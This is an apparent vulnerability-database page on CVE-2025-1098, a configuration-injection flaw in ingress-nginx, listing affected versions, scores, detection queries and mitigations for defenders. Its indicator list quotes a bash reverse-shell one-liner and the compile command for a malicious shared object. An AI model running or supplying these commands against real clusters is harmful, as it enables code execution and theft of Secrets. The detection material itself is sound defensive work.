cbcvebase.
CVE-2025-1098
published 2025-03-25

CVE-2025-1098: A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `mirror-target` and `mirror-host` Ingress annotations…

PriorityP277high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
83.07%
99.6th percentile
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `mirror-target` and `mirror-host` Ingress annotations can be used to inject arbitrary configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)

Affected

5 ranges
VendorProductVersion rangeFixed in
k8s.ioingress-nginx>= 0 < 1.11.51.11.5
k8s.ioingress-nginx>= 1.12.0-beta.0 < 1.12.11.12.1
kubernetesingress-nginx<= 1.11.4
kubernetesingress-nginx
msrcazure_kubernetes_service

Detection & IOCsextracted from sources · hover to see the quote

port8443
commandgcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto
commandbash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
filenameevil_engine.so
filenameevil_engine.c
path/proc/{proc}/fd/{fd}
url/admission
uaqmx-ingress-exploiter
othernginx.ingress.kubernetes.io/mirror-target
otherload_module test
sigma
event.type = 'Behavioral Indicators' and (k8sCluster.namespace='ingress-nginx' or k8sCluster.containerImage contains 'ingress-nginx/controller')
sigma
(k8sCluster.namespace='ingress-nginx' or k8sCluster.containerImage contains 'ingress-nginx/controller') event.type = 'IP Connect' event.network.direction='OUTGOING'
sigma
dataSource.name = 'SentinelOne' and endpoint.os = 'linux' and tgt.process.name = 'nginx' and tgt.process.cmdline contains 'nginx-cfg' and tgt.process.cmdline contains ' -t'
  • Monitor for unauthenticated POST requests carrying AdmissionReview JSON bodies sent directly to the admission controller endpoint (port 8443) from pods within the cluster, bypassing the Kubernetes API server.
  • Alert on nginx process invocations with both 'nginx-cfg' and '-t' in the command line, which indicates the configuration validation step being triggered — the point of exploitation.
  • Detect anomalous outbound IP connections originating from the ingress-nginx namespace or containers, which may indicate post-exploitation reverse shell or data exfiltration activity.
  • Detect injection attempts by looking for AdmissionReview requests where the metadata UID field contains newline characters or nginx directives such as 'load_module'.
  • Flag AdmissionReview responses containing both 'AdmissionReview' and 'load_module' alongside the error string 'directive is specified too late', which confirms successful config injection.
  • Hunt for the User-Agent string 'qmx-ingress-exploiter' in HTTP logs, which is used by the public exploit to upload the malicious shared object to the ingress endpoint.
  • Detect creation or loading of shared object files (*.so) from unexpected paths within the ingress-nginx controller pod, particularly files named 'evil_engine.so' or loaded via /proc/PID/fd/ paths.
  • Use Shodan or equivalent internet-scanning tools to identify exposed ingress-nginx admission controllers by querying for SSL certificate containing 'ingress-nginx' on port 8443.
  • Monitor for the presence of the 'nginx.ingress.kubernetes.io/mirror-target' or 'nginx.ingress.kubernetes.io/mirror-host' annotations in ingress objects submitted to the admission controller, especially with values containing special characters or newlines.
  • ·By default, the ingress-nginx admission controller is accessible over the network without authentication, making it reachable from any pod in the cluster without credentials.
  • ·In the default installation, the ingress-nginx controller runs with a Kubernetes role that grants access to all Secrets cluster-wide, maximizing the blast radius of exploitation.
  • ·Disabling the admission webhook (controller.admissionWebhooks.enabled=false) is a temporary mitigation but removes important safeguards for Ingress configurations; it must be re-enabled after patching.
  • ·The exploit brute-forces /proc/PID/fd/ file descriptors to locate the uploaded malicious shared object in memory, meaning the attack does not require writing to disk in a persistent manner.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vendor_msrc8.8HIGH
vendor_redhat8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.